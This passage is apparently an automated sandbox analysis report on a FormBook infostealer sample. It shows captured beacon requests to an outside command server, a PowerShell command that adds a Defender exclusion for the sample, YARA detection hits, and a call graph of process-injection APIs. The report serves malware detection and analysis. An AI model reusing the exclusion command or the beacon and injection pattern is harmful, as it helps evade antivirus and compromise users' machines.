                                                                                                                                    Data Ascii: EzZ=kEYc/tKW9nCWluQZrGBt7gBxP5duo8DxCFeNPoyRK6TWsNNCATLyyT/FOseluFfFUEk/RgkqgZqycSyiIAU4yaOmeDIggdnngei6jwZtx0p1DZYa9iQW0BkqGKLdF47kyqaafLiv/Guc1SarwrfXnZwZxAHf/MsnPGR8hLADS5Zb/z/JB3xAvPbYVUYEguKuUqYOkxWfENBVZIgyLH1vecNucAZ7C1hiDHslXfUV5vv/dPfkEf6UJ9jFmhJBCMpS/xCnana/7k5iXh+64xMmd3Uvr7bcGxjaqeLg6iptugV5pfqPYxn+MmlHo4riLJ8J6jPwIw2vjRCU2qEAnEGqoHdmK8C3WwWTN2A4QaKrxlfm8erFbSiciGgUt+iTULD+lgRkr7JQeu0C29p6vGlrsaNgjXNTbaRF9/Tzmn+ZQccLjDp6SqDh1ouECJUpZll0cbovSj9SNnrZBxzzSgqDS3AiCmDbjTrQIrfZ+//Ydjlg9RrIX0g2YhZR2ocWWdG5WAmYcEShEDqqwqpHo8M/Uj4T/yFxsE8W644VdmHTHRmYMl/6z/zQoU0iC1RYoPcDYBoFQuWdny2e3QnFYTt02DBM0JE5BVQ3JLwl7Bift8Kktrkr267QtloXa7HfB9ZM00v9PnsDvY2ReapbPS5ruimaohUGB7L5scarsMRPN4ETWzb5YX3mIAr1ZPaA5ECUWDObAJBRiGpoZKDT3KOi6562FUKgoeCpSA4q2mckxgG9iL8ccL8Lbj5z02ZddjWoHRg8F6NE9vsBEBxjI7Wnimcx5hAJ2jrj9ZfsUayKVuA2WJwwrCoPTvA/wLxrBSXozRc6YOIHgWLlBQclBSMqvBThi45tfZA/GOZv0XB151XfVnSh9zyj9GZb1cDSJFn6xvuXihndoMYJL/ViHR6XD2aaiDbB1amT2xY/FtQHanSbUl6OsL1y08ABI884KZAVgUuwtiWU31IHOevwNfznqn6MkWrdmlCL+10nR3KqytehYUz9 [TRUNCATED]


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    20192.168.2.450028124.6.61.130805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:48:16.282807112 CET498OUTGET /hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Jan 10, 2025 19:48:18.383856058 CET468INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Date: Fri, 10 Jan 2025 18:48:16 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                    X-Redirect-By: WordPress
                                                                                                                                    Location: http://comect.online/hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:13:45:10
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Users\user\Desktop\QmBbqpEHu0.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\QmBbqpEHu0.exe"
                                                                                                                                    Imagebase:0x3a0000
                                                                                                                                    File size:916'992 bytes
                                                                                                                                    MD5 hash:EB7415C6ED5D31B69C535AFEED1AD3AC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:13:45:27
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"
                                                                                                                                    Imagebase:0xd60000
                                                                                                                                    File size:433'152 bytes
                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:13:45:27
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Users\user\Desktop\QmBbqpEHu0.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\QmBbqpEHu0.exe"
                                                                                                                                    Imagebase:0x4a0000
                                                                                                                                    File size:916'992 bytes
                                                                                                                                    MD5 hash:EB7415C6ED5D31B69C535AFEED1AD3AC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:13:45:27
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:13:45:32
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                                    File size:496'640 bytes
                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:13:45:55
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe"
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:140'800 bytes
                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:13:45:58
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\finger.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                                                                    Imagebase:0xfd0000
                                                                                                                                    File size:13'824 bytes
                                                                                                                                    MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:13:46:13
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe"
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:140'800 bytes
                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:13:46:28
                                                                                                                                    Start date:10/01/2025
                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                                    File size:676'768 bytes
                                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:11%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:4.6%
                                                                                                                                      Total number of Nodes:174
                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                      execution_graph 32160 27ab1f8 32163 27ab2e0 32160->32163 32161 27ab207 32164 27ab2f0 32163->32164 32165 27ab324 32164->32165 32166 27ab528 GetModuleHandleW 32164->32166 32165->32161 32167 27ab555 32166->32167 32167->32161 32172 27a4668 32173 27a467a 32172->32173 32174 27a4686 32173->32174 32176 27a4779 32173->32176 32177 27a479d 32176->32177 32181 27a4878 32177->32181 32185 27a4888 32177->32185 32182 27a48af 32181->32182 32183 27a498c 32182->32183 32189 27a44b0 32182->32189 32183->32183 32186 27a48af 32185->32186 32187 27a44b0 CreateActCtxA 32186->32187 32188 27a498c 32186->32188 32187->32188 32190 27a5918 CreateActCtxA 32189->32190 32192 27a59db 32190->32192 32168 7470040 32170 747008e DrawTextExW 32168->32170 32171 74700e6 32170->32171 32193 747da10 32194 747da58 VirtualProtect 32193->32194 32195 747da92 32194->32195 32196 27ad560 32197 27ad564 32196->32197 32201 27ad740 32197->32201 32204 27ad730 32197->32204 32198 27ad693 32207 27ad070 32201->32207 32205 27ad76e 32204->32205 32206 27ad070 DuplicateHandle 32204->32206 32205->32198 32206->32205 32208 27ad7a8 DuplicateHandle 32207->32208 32210 27ad76e 32208->32210 32210->32198 32244 765ae1f 32245 765ae25 32244->32245 32250 765baf6 32245->32250 32264 765ba90 32245->32264 32277 765ba81 32245->32277 32246 765ae36 32251 765ba84 32250->32251 32253 765baf9 32250->32253 32252 765bab2 32251->32252 32290 765c061 32251->32290 32295 765c0b6 32251->32295 32300 765c377 32251->32300 32305 765c59a 32251->32305 32309 765c38a 32251->32309 32314 765c0c9 32251->32314 32319 765c7ec 32251->32319 32324 765c10c 32251->32324 32332 765beb2 32251->32332 32337 765c1a2 32251->32337 32252->32246 32253->32246 32265 765baaa 32264->32265 32266 765bab2 32265->32266 32267 765c377 2 API calls 32265->32267 32268 765c0b6 2 API calls 32265->32268 32269 765c061 2 API calls 32265->32269 32270 765c1a2 2 API calls 32265->32270 32271 765beb2 2 API calls 32265->32271 32272 765c10c 4 API calls 32265->32272 32273 765c7ec 2 API calls 32265->32273 32274 765c0c9 2 API calls 32265->32274 32275 765c38a 2 API calls 32265->32275 32276 765c59a 2 API calls 32265->32276 32266->32246 32267->32266 32268->32266 32269->32266 32270->32266 32271->32266 32272->32266 32273->32266 32274->32266 32275->32266 32276->32266 32278 765baaa 32277->32278 32279 765bab2 32278->32279 32280 765c377 2 API calls 32278->32280 32281 765c0b6 2 API calls 32278->32281 32282 765c061 2 API calls 32278->32282 32283 765c1a2 2 API calls 32278->32283 32284 765beb2 2 API calls 32278->32284 32285 765c10c 4 API calls 32278->32285 32286 765c7ec 2 API calls 32278->32286 32287 765c0c9 2 API calls 32278->32287 32288 765c38a 2 API calls 32278->32288 32289 765c59a 2 API calls 32278->32289 32279->32246 32280->32279 32281->32279 32282->32279 32283->32279 32284->32279 32285->32279 32286->32279 32287->32279 32288->32279 32289->32279 32291 765bfe9 32290->32291 32292 765be8f 32291->32292 32342 7659a70 32291->32342 32346 7659a78 32291->32346 32292->32252 32296 765c0c3 32295->32296 32350 765a4f0 32296->32350 32354 765a4f8 32296->32354 32297 765c1fc 32297->32252 32301 765c858 32300->32301 32358 7659b28 32301->32358 32362 7659b20 32301->32362 32302 765c873 32307 765a4f0 WriteProcessMemory 32305->32307 32308 765a4f8 WriteProcessMemory 32305->32308 32306 765c5be 32307->32306 32308->32306 32310 765bfe9 32309->32310 32311 765be8f 32310->32311 32312 7659a70 ResumeThread 32310->32312 32313 7659a78 ResumeThread 32310->32313 32311->32252 32312->32310 32313->32310 32315 765c0ec 32314->32315 32317 765a4f0 WriteProcessMemory 32315->32317 32318 765a4f8 WriteProcessMemory 32315->32318 32316 765c183 32316->32252 32317->32316 32318->32316 32320 765c9cf 32319->32320 32322 7659b20 Wow64SetThreadContext 32320->32322 32323 7659b28 Wow64SetThreadContext 32320->32323 32321 765c9ea 32322->32321 32323->32321 32325 765c112 32324->32325 32366 765a5e1 32325->32366 32370 765a5e8 32325->32370 32326 765bfe9 32327 765be8f 32326->32327 32328 7659a70 ResumeThread 32326->32328 32329 7659a78 ResumeThread 32326->32329 32327->32252 32328->32326 32329->32326 32333 765bec5 32332->32333 32374 765a780 32333->32374 32378 765a775 32333->32378 32334 765bfc4 32338 765c1b4 32337->32338 32382 765a430 32338->32382 32386 765a438 32338->32386 32339 765c6e5 32343 7659a78 ResumeThread 32342->32343 32345 7659ae9 32343->32345 32345->32291 32347 7659ab8 ResumeThread 32346->32347 32349 7659ae9 32347->32349 32349->32291 32351 765a4f8 WriteProcessMemory 32350->32351 32353 765a597 32351->32353 32353->32297 32355 765a540 WriteProcessMemory 32354->32355 32357 765a597 32355->32357 32357->32297 32359 7659b6d Wow64SetThreadContext 32358->32359 32361 7659bb5 32359->32361 32361->32302 32363 7659b28 Wow64SetThreadContext 32362->32363 32365 7659bb5 32363->32365 32365->32302 32367 765a633 ReadProcessMemory 32366->32367 32369 765a677 32367->32369 32369->32326 32371 765a633 ReadProcessMemory 32370->32371 32373 765a677 32371->32373 32373->32326 32375 765a809 CreateProcessA 32374->32375 32377 765a9cb 32375->32377 32379 765a780 CreateProcessA 32378->32379 32381 765a9cb 32379->32381 32383 765a438 VirtualAllocEx 32382->32383 32385 765a4b5 32383->32385 32385->32339 32387 765a478 VirtualAllocEx 32386->32387 32389 765a4b5 32387->32389 32389->32339 32211 747db18 32212 747db3f 32211->32212 32216 747dde2 32212->32216 32221 747ddf0 32212->32221 32213 747dbb6 32217 747de17 32216->32217 32218 747e044 32217->32218 32226 765cc68 32217->32226 32230 765cc5a 32217->32230 32218->32213 32223 747de17 32221->32223 32222 747e044 32222->32213 32223->32222 32224 765cc68 PostMessageW 32223->32224 32225 765cc5a PostMessageW 32223->32225 32224->32223 32225->32223 32227 765cc7a 32226->32227 32228 765cc88 32227->32228 32237 765cc90 32227->32237 32228->32217 32231 765cc63 32230->32231 32234 765cccb 32230->32234 32232 765cc88 32231->32232 32236 765cc90 PostMessageW 32231->32236 32232->32217 32233 765ce6b 32233->32217 32234->32233 32235 765a0c0 PostMessageW 32234->32235 32235->32234 32236->32232 32238 765cc93 32237->32238 32239 765cc9b 32238->32239 32241 765a0c0 32238->32241 32239->32228 32242 765cf60 PostMessageW 32241->32242 32243 765cfcc 32242->32243 32243->32238

                                                                                                                                      Executed Functions

                                                                                                                                      Function 07478A10 Relevance: 4.1, Strings: 3, Instructions: 383COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 312 7478a10-7478a16 313 7478a68-7478a91 312->313 314 7478a18-7478a1a 312->314 315 7478a93-7478ac5 313->315 316 7478ada-7478b08 313->316 317 7478a4e-7478a65 314->317 318 7478ac7-7478ac8 315->318 319 7478b0e-7478b1c 315->319 316->319 317->313 318->317 320 7478b1e-7478b20 319->320 321 7478b22-7478b46 320->321 322 7478acb-7478acc 320->322 324 7478b4d 321->324 323 7478ace-7478ad5 322->323 322->324 323->320 328 7478ad7-7478ad8 323->328 326 7478b54-7478b92 call 74790d0 324->326 327 7478b4f 324->327 330 7478b98 326->330 327->326 328->316 331 7478b9f-7478bbb 330->331 332 7478bc4-7478bc5 331->332 333 7478bbd 331->333 352 7478f1b-7478f22 332->352 333->330 333->332 334 7478da3-7478db8 333->334 335 7478c40-7478c58 333->335 336 7478ded-7478df1 333->336 337 7478cad-7478ccb 333->337 338 7478c0b-7478c14 333->338 339 7478eab-7478ed0 333->339 340 7478bca-7478bce 333->340 341 7478d77-7478d8c 333->341 342 7478bf7-7478c09 333->342 343 7478d36-7478d56 333->343 344 7478c96-7478ca8 333->344 345 7478ed5-7478ee1 333->345 346 7478d91-7478d9e 333->346 347 7478cd0-7478cdc 333->347 348 7478d1f-7478d31 333->348 349 7478eff-7478f16 333->349 350 7478dbd-7478dc1 333->350 351 7478e1d-7478e29 333->351 333->352 353 7478d5b-7478d72 333->353 354 7478cfa-7478d1a 333->354 334->331 361 7478c5f-7478c75 335->361 362 7478c5a 335->362 367 7478e04-7478e0b 336->367 368 7478df3-7478e02 336->368 337->331 359 7478c27-7478c2e 338->359 360 7478c16-7478c25 338->360 339->331 357 7478be1-7478be8 340->357 358 7478bd0-7478bdf 340->358 341->331 342->331 343->331 344->331 363 7478ee3 345->363 364 7478ee8-7478efa 345->364 346->331 355 7478ce3-7478cf5 347->355 356 7478cde 347->356 348->331 349->331 365 7478dd4-7478ddb 350->365 366 7478dc3-7478dd2 350->366 369 7478e30-7478e46 351->369 370 7478e2b 351->370 353->331 354->331 355->331 356->355 373 7478bef-7478bf5 357->373 358->373 375 7478c35-7478c3b 359->375 360->375 385 7478c77 361->385 386 7478c7c-7478c91 361->386 362->361 363->364 364->331 377 7478de2-7478de8 365->377 366->377 378 7478e12-7478e18 367->378 368->378 383 7478e4d-7478e63 369->383 384 7478e48 369->384 370->369 373->331 375->331 377->331 378->331 389 7478e65 383->389 390 7478e6a-7478e80 383->390 384->383 385->386 386->331 389->390 392 7478e87-7478ea6 390->392 393 7478e82 390->393 392->331 393->392
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ry$ry$ry
                                                                                                                                      • API String ID: 0-128149707
                                                                                                                                      • Opcode ID: f9c2bcc5cdd64fd22743a3d40fe9ceeddefdefa314a28f68d637dac767c64bc7
                                                                                                                                      • Instruction ID: 4a2478f2c1f372c8ad8694b63784106360f22f5e905cc366a9939d3bb7527285
                                                                                                                                      • Opcode Fuzzy Hash: f9c2bcc5cdd64fd22743a3d40fe9ceeddefdefa314a28f68d637dac767c64bc7
                                                                                                                                      • Instruction Fuzzy Hash: C0F19FB5D14206DFCB04CFA9C4894EEFBB6FF89310B10C96AD5159B241D734AA82CF90
                                                                                                                                      Function 07478ACA Relevance: 4.1, Strings: 3, Instructions: 319COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 396 7478aca 397 7478acb-7478acc 396->397 398 7478ace-7478ad5 397->398 399 7478b4d 397->399 402 7478ad7-7478b1c 398->402 403 7478b1e-7478b20 398->403 400 7478b54-7478b92 call 74790d0 399->400 401 7478b4f 399->401 409 7478b98 400->409 401->400 402->403 403->397 405 7478b22-7478b46 403->405 405->399 410 7478b9f-7478bbb 409->410 411 7478bc4-7478bc5 410->411 412 7478bbd 410->412 431 7478f1b-7478f22 411->431 412->409 412->411 413 7478da3-7478db8 412->413 414 7478c40-7478c58 412->414 415 7478ded-7478df1 412->415 416 7478cad-7478ccb 412->416 417 7478c0b-7478c14 412->417 418 7478eab-7478ed0 412->418 419 7478bca-7478bce 412->419 420 7478d77-7478d8c 412->420 421 7478bf7-7478c09 412->421 422 7478d36-7478d56 412->422 423 7478c96-7478ca8 412->423 424 7478ed5-7478ee1 412->424 425 7478d91-7478d9e 412->425 426 7478cd0-7478cdc 412->426 427 7478d1f-7478d31 412->427 428 7478eff-7478f16 412->428 429 7478dbd-7478dc1 412->429 430 7478e1d-7478e29 412->430 412->431 432 7478d5b-7478d72 412->432 433 7478cfa-7478d1a 412->433 413->410 440 7478c5f-7478c75 414->440 441 7478c5a 414->441 446 7478e04-7478e0b 415->446 447 7478df3-7478e02 415->447 416->410 438 7478c27-7478c2e 417->438 439 7478c16-7478c25 417->439 418->410 436 7478be1-7478be8 419->436 437 7478bd0-7478bdf 419->437 420->410 421->410 422->410 423->410 442 7478ee3 424->442 443 7478ee8-7478efa 424->443 425->410 434 7478ce3-7478cf5 426->434 435 7478cde 426->435 427->410 428->410 444 7478dd4-7478ddb 429->444 445 7478dc3-7478dd2 429->445 448 7478e30-7478e46 430->448 449 7478e2b 430->449 432->410 433->410 434->410 435->434 452 7478bef-7478bf5 436->452 437->452 454 7478c35-7478c3b 438->454 439->454 464 7478c77 440->464 465 7478c7c-7478c91 440->465 441->440 442->443 443->410 456 7478de2-7478de8 444->456 445->456 457 7478e12-7478e18 446->457 447->457 462 7478e4d-7478e63 448->462 463 7478e48 448->463 449->448 452->410 454->410 456->410 457->410 468 7478e65 462->468 469 7478e6a-7478e80 462->469 463->462 464->465 465->410 468->469 471 7478e87-7478ea6 469->471 472 7478e82 469->472 471->410 472->471
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ry$ry$ry
                                                                                                                                      • API String ID: 0-128149707
                                                                                                                                      • Opcode ID: 3d217ef0208421948784a066900a320a3d82491738fc97abd92d92735724fbfa
                                                                                                                                      • Instruction ID: 3d7bd9e9f815fd14e642d3279a13018c78748c783e1766a6adb173406d03238c
                                                                                                                                      • Opcode Fuzzy Hash: 3d217ef0208421948784a066900a320a3d82491738fc97abd92d92735724fbfa
                                                                                                                                      • Instruction Fuzzy Hash: 0FD17AB4D1420ADFCB04CFA9C4898EEFBB6FF89310B149956D411AB255C734AA82CF90
                                                                                                                                      Function 0747654D Relevance: 4.0, Strings: 3, Instructions: 291COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 475 747654d-7476558 476 74765b5-74765c9 475->476 477 747655a-7476568 475->477 478 74765ca-74765e3 476->478 477->478 479 747656a-747659c 477->479 483 74765e5 478->483 484 74765ea-74765fb 478->484 481 747659e-74765b4 479->481 482 74765fd-7476644 479->482 481->476 487 7476647 482->487 483->484 484->482 488 747664e-747666a 487->488 489 7476673-7476674 488->489 490 747666c 488->490 491 7476820-7476890 489->491 492 7476679-74766a1 489->492 490->487 490->491 490->492 493 74767c3-74767de 490->493 494 74766a3-74766b5 490->494 495 74767e3-74767fa 490->495 496 747670c-7476736 490->496 497 74766b7-74766d7 490->497 498 7476776-747678b 490->498 499 7476790-74767be 490->499 500 74767ff-747681b 490->500 501 74766dc-74766e0 490->501 502 747673b-7476771 490->502 518 7476892 call 7478967 491->518 519 7476892 call 7477f7b 491->519 520 7476892 call 7477caa 491->520 521 7476892 call 7478918 491->521 492->488 493->488 494->488 495->488 496->488 497->488 498->488 499->488 500->488 503 74766f3-74766fa 501->503 504 74766e2-74766f1 501->504 502->488 505 7476701-7476707 503->505 504->505 505->488 517 7476898-74768a2 518->517 519->517 520->517 521->517
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Tefq$Tefq$z^I
                                                                                                                                      • API String ID: 0-2708104242
                                                                                                                                      • Opcode ID: 99815b73960a585a63b8ba1f4b112dd8c0e50bfa06ce2b76ae4c461b67f0d67d
                                                                                                                                      • Instruction ID: e4464df1eabfc023f3b377d5715cd0f815b9a9d8f6c8b994386d86b69137fd78
                                                                                                                                      • Opcode Fuzzy Hash: 99815b73960a585a63b8ba1f4b112dd8c0e50bfa06ce2b76ae4c461b67f0d67d
                                                                                                                                      • Instruction Fuzzy Hash: E3B16AB5E146098FCB04CFAAD8806DEFBB2FF89310F24942AC415AB254D7349946CFA5
                                                                                                                                      Function 07478B28 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
